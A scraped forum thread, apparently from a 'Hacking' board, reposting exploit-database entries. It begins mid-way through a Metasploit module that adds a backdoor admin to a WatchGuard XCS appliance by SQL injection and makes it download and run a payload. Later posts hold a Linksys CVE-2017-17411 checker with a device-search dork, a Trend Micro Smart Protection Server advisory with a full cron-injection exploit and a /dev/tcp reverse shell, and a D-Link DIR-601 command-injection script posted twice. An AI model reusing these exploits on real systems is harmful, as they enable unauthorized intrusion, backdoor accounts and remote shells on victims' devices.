priv_level, quota, disk_usage) VALUES(#{user_id}, '#{username}', '#{pwd_hash}', 0, 'server_admin', 0, 0)--" }) unless res && res.body fail_with(Failure::Unreachable, "Could not connect to host") end if res.body.include?('ERROR: duplicate key value violates unique constraint') print_status("Added backdoor user, credentials => #{username}:#{pwd_clear}") else fail_with(Failure::UnexpectedReply, 'Unable to add user to database') end true end def generate_device_hash(cleartext_password) #Generates the specific hashes needed for the XCS pre_salt = 'BorderWare ' post_salt = ' some other random (9) stuff' hash_tmp = Rex::Text.md5(pre_salt + cleartext_password + post_salt) final_hash = Rex::Text.md5(cleartext_password + hash_tmp) final_hash end def send_cmd_exec(uri, os_cmd, blocking = true) #This is a handler function that makes HTTP calls to exploit the command injection issue unless @sid fail_with(Failure::Unknown, 'Missing a session cookie when attempting to execute command.') end opts = { 'uri' => normalize_uri(target_uri.path, "#{uri}"), 'cookie' => "sid=#{@sid}", 'encode_params' => true, 'vars_get' => { 'f' => 'dnld', 'id' => ";#{os_cmd}" } } if blocking res = send_request_cgi(opts) else res = send_request_cgi(opts, 1) end #Handle cmd exec failures if res.nil? && blocking fail_with(Failure::Unknown, 'Failed to exploit command injection.') end res end def get_session #Gets a valid login session, either valid creds or the SQLi vulnerability username = datastore['WATCHGUARD_USER'] pwd_clear = datastore['WATCHGUARD_PASSWORD'] user_id = rand(999) sid_cookie = attempt_login(username, pwd_clear) return sid_cookie unless sid_cookie.nil? vprint_error('Failed to login, attempting to add backdoor user...') pwd_hash = generate_device_hash(pwd_clear) unless add_user(user_id, username, pwd_hash, pwd_clear) fail_with(Failure::Unknown, 'Failed to add user account to database.') end sid_cookie = attempt_login(username, pwd_clear) unless sid_cookie fail_with(Failure::Unknown, 'Unable to login with user account.') end sid_cookie end # Make the server download the payload and run it def primer vprint_status('Primer hook called, make the server get and run exploit') #Gets the autogenerated uri from the mixin payload_uri = get_uri filename = rand_text_alpha_lower(8) print_status("Sending download request for #{payload_uri}") download_cmd = "/usr/local/sbin/curl -k #{payload_uri} -o /tmp/#{filename}" vprint_status("Telling appliance to run #{download_cmd}") send_cmd_exec('/ADMIN/mailqueue.spl', download_cmd) register_file_for_cleanup("/tmp/#{filename}") chmod_cmd = "chmod +x /tmp/#{filename}" vprint_status('Chmoding the payload...') send_cmd_exec("/ADMIN/mailqueue.spl", chmod_cmd) exec_cmd = "/tmp/#{filename}" vprint_status('Running the payload...') send_cmd_exec('/ADMIN/mailqueue.spl', exec_cmd, false) vprint_status('Finished primer hook, raising Timeout::Error manually') raise(Timeout::Error) end #Handle incoming requests from the server def on_request_uri(cli, request) vprint_status("on_request_uri called: #{request.inspect}") print_status('Sending the payload to the server...') @elf_sent = true send_response(cli, @pl) end end
  20. Source: https://code.google.com/p/google-security-research/issues/detail?id=546 Avast will render the commonName of X.509 certificates into an HTMLLayout frame when your MITM proxy detects a bad signature. Unbelievably, this means CN="<h1>really?!?!?</h1>" actually works, and is pretty simple to convert into remote code execution. To verify this bug, I've attached a demo certificate for you. Please find attached key.pem, cert.pem and cert.der. Run this command to serve it from a machine with openssl: $ sudo openssl s_server -key key.pem -cert cert.pem -accept 443 Then visit that https server from a machine with Avast installed. Click the message that appears to demonstrate launching calc.exe. Proof of Concept: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38384.zip
  21. Moeein Seven

    Hacking

    #!/usr/bin/python # -*- coding: utf-8 -*- # Author: Nixawk # CVE-2017-17411 # Linksys WVBR0 25 Command Injection """ $ python2.7 exploit-CVE-2017-17411.py [*] Usage: python exploit-CVE-2017-17411.py <URL> $ python2.7 exploit-CVE-2017-17411.py http://example.com/ [+] Target is exploitable by CVE-2017-17411 """ import requests def check(url): payload = '"; echo "admin' md5hash = "456b7016a916a4b178dd72b947c152b7" # echo "admin" | md5sum resp = send_http_request(url, payload) if not resp: return False lines = resp.text.splitlines() sys_cmds = filter(lambda x: "config.webui sys_cmd" in x, lines) if not any([payload in sys_cmd for sys_cmd in sys_cmds]): return False if not any([md5hash in sys_cmd for sys_cmd in sys_cmds]): return False print("[+] Target is exploitable by CVE-2017-17411 ") return True def send_http_request(url, payload): headers = { 'User-Agent': payload } response = None try: response = requests.get(url, headers=headers) except Exception as err: log.exception(err) return response if __name__ == '__main__': import sys if len(sys.argv) != 2: print("[*] Usage: python %s <URL>" % sys.argv[0]) sys.exit(0) check(sys.argv[1]) # google dork: "Vendor:LINKSYS ModelName:WVBR0-25-US" ## References # https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair # https://thehackernews.com/2017/12/directv-wvb-hack.html
  22. # Trend Micro Smart Protection Server Multiple Vulnerabilities ## 1. Advisory Information **Title:**: Trend Micro Smart Protection Server Multiple Vulnerabilities **Advisory ID:** CORE-2017-0008 **Advisory URL:** http://www.coresecurity.com/advisories/trend-micro-smart-protection-server-multiple-vulnerabilities **Date published:** 2017-12-19 **Date of last update:** 2017-12-11 **Vendors contacted:** Trend Micro **Release mode:** Coordinated release ## 2. Vulnerability Information **Class:** Information Exposure Through Log Files [[CWE-532](http://cwe.mitre.org/data/definitions/532.html)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](http://cwe.mitre.org/data/definitions/78.html)], Improper Control of Filename for Include/Require Statement in PHP Program [[CWE-98](http://cwe.mitre.org/data/definitions/98.html)], Improper Neutralization of Input During Web Page Generation [[CWE-79](http://cwe.mitre.org/data/definitions/79.html)], Improper Authorization [[CWE-285](http://cwe.mitre.org/data/definitions/285.html)] **Impact:** Code execution **Remotely Exploitable:** Yes **Locally Exploitable:** Yes **CVE Name:** [CVE-2017-11398](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-11398), [CVE-2017-14094](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14094), [CVE-2017-14095](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14095), [CVE-2017-14096](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14096), [CVE-2017-14097](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14097) ## 3. Vulnerability Description Trend Micro's website states that: Trend Micro Smart Protection Server [(http://cwe.mitre.org/data/definitions/532.html)(https://www.coresecurity.com#SPS)] is a next-generation, in-the-cloud based, advanced protection solution. At the core of this solution is an advanced scanning architecture that leverages malware prevention signatures that are stored in-the-cloud. This solution leverages file reputation and Web reputation technology to detect security risks. The technology works by off loading a large number of malware prevention signatures and lists that were previously stored on endpoints to Trend Micro Smart Protection Server. Multiple vulnerabilities were found in the Smart Protection Server's Administration UI that would allow a remote unauthenticated attacker to execute arbitrary commands on the system. ## 4. Vulnerable Packages * Trend Micro Smart Protection Server 3.2 (Build 1085) Other products and versions might be affected, but they were not tested. ## 5. Vendor Information, Solutions and Workarounds Trend Micro published the following patches: * TMSPS3.0 - Critical Patch B1354 ([link](http://downloadcenter.trendmicro.com/index.php?clk=tbl&clkval=4556®s=NABU&lang_loc=1#fragment-4628)) * TMSPS3.1 - Critical Patch B1057 ([link](http://downloadcenter.trendmicro.com/index.php?clk=tbl&clkval=4974®s=NABU&lang_loc=1#fragment-5030)) ## 6. Credits These vulnerabilities were discovered and researched by Leandro Barragan and Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team. ## 7. Technical Description / Proof of Concept Code In section 7.1 we describe how an unauthenticated attacker could get a session token to perform authenticated requests against the application. Sections 7.2 and 7.3 describe two vectors to achieve remote command execution in the context of the Web application. Several public privilege escalation vulnerabilities exist that are still unpatched. In combination with the aforementioned vulnerabilities a remote unauthenticated attacker would be able to execute arbitrary system commands with root privileges. Sections 7.4 and 7.5 cover other common Web application vulnerabilities found in the product's console. ### 7.1 Session hijacking via log file disclosure [[CVE-2017-11398](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-11398)] The application stores diagnostic logs in the /widget/repository/log/diagnostic.log file. Performing a login or some basic browsing will write several entries with the following format: ``` 2017-08-18 17:00:38,468,INFO,rti940901j0556161dudhj6805,null, Notice: Undefined index: param in /var/www/AdminUI/widget/inc/class/common/db/GenericDao.php on line 218 ``` Each log entry leaks the associated session ID next to the log alert level and can be accessed via HTTP without authenticating to the Web application. Therefore, an unauthenticated attacker can grab this file and hijack active user sessions to perform authenticated requests. ### 7.2 Remote command execution via cron job injection [[CVE-2017-14094](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14094)] The script admin_update_program.php is responsible for creating a cron job when software updates are scheduled. The HTTP request contains several parameters that are used without sanitization as part of the cron job created at /var/spool/cron/webserv. We will target the hidTimingMin parameter. File /var/www/AdminUI/php/admin_update_program.php: ``` if ($_SERVER['REQUEST_METHOD'] == 'POST'){ [...] $arr_au['Program']['AUScheduleTimingMin']= isset($_POST["hidTimingMin"])?$_POST["hidTimingMin"]:"0"; [...] if ( $arr_au['Program']['UseAUSchedule'] == "1"){ if ( $arr_au['Program']['AUScheduleType'] == "0" ){ $crontab->setDateParams($arr_au['Program']['AUScheduleTimingMin'], $arr_au['Program']['AUScheduleTimingHour'], "*", "*", "*"); }else { $crontab->setDateParams($arr_au['Program']['AUScheduleTimingMin'], $arr_au['Program']['AUScheduleTimingHour'], "*", "*", $arr_au['Program']['AUScheduleTimingDay']); } $crontab->setCommand("/usr/tmcss/bin/UpdateManage.exe --Program --Schedule > /dev/null 2>&1"); $crontab->saveCronFile(); } if(! $crontab->addToCrontab()){ header( 'Location: admin_update_program.php?status=savecrontaberror&sid='.$session_name ) ; exit; } ``` File /var/www/AdminUI/php/inc/crontab.php: ``` function setDateParams($min=NULL, $hour=NULL, $day=NULL, $month=NULL, $dayofweek=NULL){ if($min=="0") $this->minute=0; elseif($min) $this->minute=$min; else $this->minute="*"; if($hour=="0") $this->hour=0; elseif($hour) $this->hour=$hour; else $this->hour="*"; $this->month=($month) ? $month : "*"; $this->day=($day) ? $day : "*"; $this->dayofweek=($dayofweek != NULL) ? $dayofweek : "*"; } function saveCronFile(){ $command=$this->minute." ".$this->hour." ".$this->day." ".$this->month." ".$this->dayofweek." ".$this->command."n"; if(!fwrite($this->handle, $command)) return true; else return false; } function addToCrontab(){ if(!$this->filename) exit('No name specified for cron file'); $data=array(); exec("crontab ".escapeshellarg($this->directory.$this->filename),$data,$ret); if($ret==0) return true; else return false; } ``` The following python script creates a cron job that will run an arbitrary command on every minute. It also leverages the session hijacking vulnerability described in 7.1 to bypass the need of authentication. ``` #!/usr/bin/env python import requests import sys def exploit(host, port, command): session_id = get_session_id(host, port) print "[+] Obtained session id %s" % session_id execute_command(session_id, host, port, command) def get_session_id(host, port): url = "https://%s:%d/widget/repository/log/diagnostic.log" % (host, port) r = requests.get(url, verify=False) for line in r.text.split('n')[::-1]: if "INFO" in line or "ERROR" in line: return line.split(',')(http://cwe.mitre.org/data/definitions/98.html) def execute_command(session_id, host, port, command): print "[+] Executing command '%s' on %s:%d" % (command, host, port) url = "https://%s:%d/php/admin_update_program.php?sid=%s" % (host, port, session_id) multipart_data = { "ComponentSchedule": "on", "ComponentScheduleOS": "on", "ComponentScheduleService": "on", "ComponentScheduleWidget": "on", "useAUSchedule": "on", "auschedule_setting": "1", "update_method": "1", "update_method3": "on", "userfile": "", "sid": session_id, "hidComponentScheduleOS": "1", "hidComponentScheduleService": "1", "hidComponentScheduleWidget": "1", "hidUseAUSchedule": "1", "hidScheduleType": "1", "hidTimingDay": "2", "hidTimingHour": "2", "hidTimingMin": "* * * * * %s #" % command, "hidUpdateOption": "1", "hidUpdateNowFlag": "" } r = requests.post(url, data=multipart_data, cookies={session_id: session_id}, verify=False) if "MSG_UPDATE_UPDATE_SCHEDULE" in r.text: print "[+] Cron job added, enjoy!" else: print "[-] Session has probably timed out, try again later!" if __name__ == "__main__": exploit(sys.argv(http://cwe.mitre.org/data/definitions/532.html), int(sys.argv(http://cwe.mitre.org/data/definitions/78.html)), sys.argv(http://cwe.mitre.org/data/definitions/98.html)) ``` The following proof of concept opens a reverse shell to the attacker's machine. ``` $ python coso.py 192.168.45.186 4343 'bash -i >& /dev/tcp/192.168.45.80/8888 0>&1' [+] Obtained session id q514un6ru6stcpf3k0n4putbd3 [+] Executing command 'bash -i >& /dev/tcp/192.168.45.80/8888 0>&1' on 192.168.45.186:4343 [+] Cron job added, enjoy! $ nc -lvp 8888 Listening on [0.0.0.0] (family 0, port 8888) Connection from [192.168.45.186] port 8888 [tcp/*] accepted (family 2, sport 59508) bash: no job control in this shell [webserv@ localhost ~]$ ``` ### 7.3 Remote command execution via local file inclusion [[CVE-2017-14095](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14095)] The /widget/inc/widget_package_manager.php script passes user provided input to the PHP require_once function without sanitization. However, there are some restrictions that need to be overcome in order to include arbitrary files, as the application appends PoolManager.php at the end of the filename. File /var/www/AdminUI/widget/inc/widget_package_manager.php: ``` switch($widgetRequest['act']){ case "check": try{ // $strUpdateType = widget, configure_widget_and_widget_component $strUpdateType = isset($widgetRequest['update_type']) ? $widgetRequest['update_type'] : 'widget'; $strFuncName = 'is'.WF::getTypeFactory()->getString()->getUpperCamelCase($strUpdateType).'Update'; $isUpdate = WF::getWidgetPoolFactory()->getWidgetPoolManager($strUpdateType)->$strFuncName(); [...] ``` File /var/www/AdminUI/widget/inc/class/widgetPool/WidgetPoolFactory.abstract.php: ``` public function getWidgetPoolManager($strUpdateType = 'widget'){ if(! isset(self::$instance[__FUNCTION__][$strUpdateType])){ $strFileName = $this->objFramework->getTypeFactory()->getString()->getUpperCamelCase($strUpdateType); require_once (self::getDirnameFile() . '/widget/'.$strFileName.'PoolManager.php'); $strClassName = 'WF'.$strFileName.'PoolManager'; self::$instance[__FUNCTION__][$strUpdateType] = new $strClassName($this->objFramework); } return self::$instance[__FUNCTION__][$strUpdateType]; } ``` One way for an attacker to place an arbitrary file on the system is to abuse the update process that can be managed from the same product console. Files downloaded from alternate update sources are stored in the /var/tmcss/activeupdate directory. An attacker can setup a fake update server and trigger an update from it to download the malicious archive. As an example, we have packed a reverse shell named rshellPoolManager.php into the bf1747402402.zip archive. The following server.ini would instruct the application to download the archive and uncompress it inside /var/tmcss/activeupdate: ``` ; ======================================= ; ActiveUpdate 1.2 US ; ; Filename: Server.ini ; ; New Format AU 1.8 ; ; Last modified by AUJP1 10/14/2015 ; ======================================= [Common] Version=1.2 CertExpireDate=Jul 28 08:52:40 2019 GMT [Server] AvailableServer=1 Server.1=http://<serverIP>:1080/ AltServer=http://<serverIP>:1080/ Https=http://<serverIP>:1080/ [PATTERN] P.48040039=pattern/bf1747402402.zip,1747402402,257 ``` After triggering an update from the Web console, the PHP script is written to the expected location. ``` [root@ localhost activeupdate]# ls -lha /var/tmcss/activeupdate/ | grep php -rw-r--r--. 1 webserv webserv 66 ago 25 22:59 rshellPoolManager.php ``` The final step is to include the script and execute our payload. ``` POST /widget/inc/widget_package_manager.php?sid=dj0efdmskngvt4lbhakgc6cru7 HTTP/1.1 Host: 192.168.45.186:4343 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: application/json Accept-Language: en-US,en;q=0.5 X-Requested-With: XMLHttpRequest X-Request: JSON X-CSRFToken: dj0efdmskngvt4lbhakgc6cru7 Content-Type: application/json; charset=utf-8 Content-Length: 122 Cookie: dj0efdmskngvt4lbhakgc6cru7=dj0efdmskngvt4lbhakgc6cru7 Connection: close {"act": "check", "update_type": "../../../../../../../../../var/tmcss/activeupdate/rshell"} ``` Steven Seeley and Roberto Suggi Liverani presented various privilege escalation vectors to move from webserv to root on their presentation "I Got 99 Trends and a # Is All Of Them". Based on our testing the attacks remain unpatched, so we did not try to find additional ways to escalate privileges. ### 7.4 Stored cross-site scripting [[CVE-2017-14096](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14096)] The ru parameter of the wcs_bwlists_handler.php script is vulnerable to cross-site scripting. This endpoint is used to manage user defined URLs. After the rule is inserted, the payload will be executed every time the user opens the user defined URLs section. The following proof of concept stores code to open an alert box. ``` https://<serverIP>:4343/php/wcs_bwlists_handler.php?sid=2f03bf97fc4912ee&req=mgmt_insert&st=1&ac=0&ru=http%3A%2F%2F%3Cscript%3Ealert(1)%3C%2Fscript%3E&rt=3&ipt=0&ip4=&ip4m=128&cn=&dn= ``` ### 7.5 Improper access control [[CVE-2017-14097](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14097)] The product console includes widgets that can be used to monitor other servers. Credentials to access the servers being monitored, widget logs and other information reside on a SQLite database which can be accessed without authentication at the following URL: ``` https://<serverIP>:4343/widget/repository/db/sqlite/tmwf.db ``` The credentials are stored using AES256 with a dynamic key. However, the key is also placed inside the Web server directories and available for download without authentication. ``` https://<serverIP>:4343/widget/repository/inc/class/common/crypt/crypt.key ``` This would allow an attacker to decrypt the contents of the database, rendering the encryption mechanism useless. ## 8 Report Timeline * **2017-09-04: **Core Security sent an initial notification to Trend Micro, including a draft advisory. * **2017-10-02: **Core Security asked for an update on the vulnerability reported. * **2017-10-02: ** Trend Micro stated they are still in the process of creating the official fix for the vulnerabilities reported. ETA for the fix should be end of this month (October) * **2017-11-13: **Core Security requested a status on the timeline for fixing the reported vulnerabilities since the original ETA was not accomplished. * **2017-11-14: ** Trend Micro stated they are still working on the Critical Patch and found problems along the way. Patch is now in QA. * **2017-11-20: ** Trend Micro informed availability for the fixes addressing 5 out of the 6 vulnerabilities reported. They stated one of the reported vulnerabilities is on a table where the SQL query is allowed and 'does not cause anything leaking'. Still in the process of localizing the critical patches for other regions. Will let us know when everything is covered in order to set a disclosure date. * **2017-11-21: **Core Security thanked the update and agreed on removing one of the reported vulnerabilities. * **2017-12-05: ** Trend Micro provided the CVE-ID for all the vulnerabilities reported and proposed the public disclosure date to be December 14th. * **2017-12-06: **Core Security thanked the update and proposed public disclosure date to be Tuesday December 19th @ 12pm EST. * **2017-12-19: ** Advisory CORE-2017-0008 published. ## 9 References http://cwe.mitre.org/data/definitions/532.html ## 10 About CoreLabs CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: . ## 11 About Core Security Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or [info@coresecurity.com](mailto:info%40coresecurity.com) ## 12 Disclaimer The contents of this advisory are copyright (c) 2017 Core Security and (c) 2017 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License:
  23. Requirements: Python 2.7 netcat Tested on: Ubuntu 14.04 LTS Vulnerable Appliance Version: 6.1.0 Download: http://downloads.solarwinds.com/solarwinds/Release/LEM/SolarWinds-LEM-v6.1.0-Evaluation-VMware.exe Instructions: The exploit_lem.py script will need to be run sudo since it uses sockets which bind to port 21 and 80. These could be changed, but the rest of the script would need to be modified as well. Prior to running the python script, set up a netcat listener for the reverse shell: netcat -l 4444 Example: sudo python exploit_lem.py -t 192.168.1.100 -b 192.168.1.101 -l 192.168.1.101 -lp 4444 After access has been gained to the appliance, a new admin user can be added to the web console by editing /usr/local/contego/run/manager/UserContextLibrary.xml. Simply copy the xml structure for the admin user that is already in there and then change the fields to create a new user. In order to get a valid password hash, use the gen_pass_hash.py script included with this package. Please note that a manager restart will be needed before you can login with the new user. This can be accomplished by running "/etc/init.d/contego-manager restart" Proof of Concept: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38644.zip
  24. Moeein Seven

    Hacking

    ## Advisory Information Title: DIR-601 Command injection in ping functionality Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink) CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages D-Link Technical Support D-Link Technical Support However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description DIR601 -- Wireless N150 Home Router. Mainly used by home and small offices. ## Vulnerabilities Summary Have come across 1 security issue in DIR601 firmware which allows an attacker to exploit command injection in ping functionality. The user needs to be logged in. After that any attacker on wireless LAN or if mgmt interface is exposed on Internet then an internet attacker can execute the attack. Also XSRF can be used to trick administrator to exploit it. ## Details Command injection in dir-601 ---------------------------------------------------------------------------------------------------------------------- import socket import struct # CMD_INJECTION_INPINGTEST # Just need user to be logged in and nothing else buf = "POST /my_cgi.cgi HTTP/1.0\r\n" buf+="HOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\nAccept-Encoding:gzip,deflate,sdch\r\nAccept-Language:en-US,en;q=0.8\r\nContent-Length:101\r\n\r\n" buf+="request=ping_test&admin3_user_name=admin1;echo admin > /var/passwd1;test&admin4_user_pwd=admin2&user_type=0"+"\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("IP_ADDRESS", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. * July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley
  25. Moeein Seven

    Hacking

    ## Advisory Information Title: DIR-601 Command injection in ping functionality Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink) CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description DIR601 -- Wireless N150 Home Router. Mainly used by home and small offices. ## Vulnerabilities Summary Have come across 1 security issue in DIR601 firmware which allows an attacker to exploit command injection in ping functionality. The user needs to be logged in. After that any attacker on wireless LAN or if mgmt interface is exposed on Internet then an internet attacker can execute the attack. Also XSRF can be used to trick administrator to exploit it. ## Details Command injection in dir-601 ---------------------------------------------------------------------------------------------------------------------- import socket import struct # CMD_INJECTION_INPINGTEST # Just need user to be logged in and nothing else buf = "POST /my_cgi.cgi HTTP/1.0\r\n" buf+="HOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\nAccept-Encoding:gzip,deflate,sdch\r\nAccept-Language:en-US,en;q=0.8\r\nContent-Length:101\r\n\r\n" buf+="request=ping_test&admin3_user_name=admin1;echo admin > /var/passwd1;test&admin4_user_pwd=admin2&user_type=0"+"\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("IP_ADDRESS", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. * July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley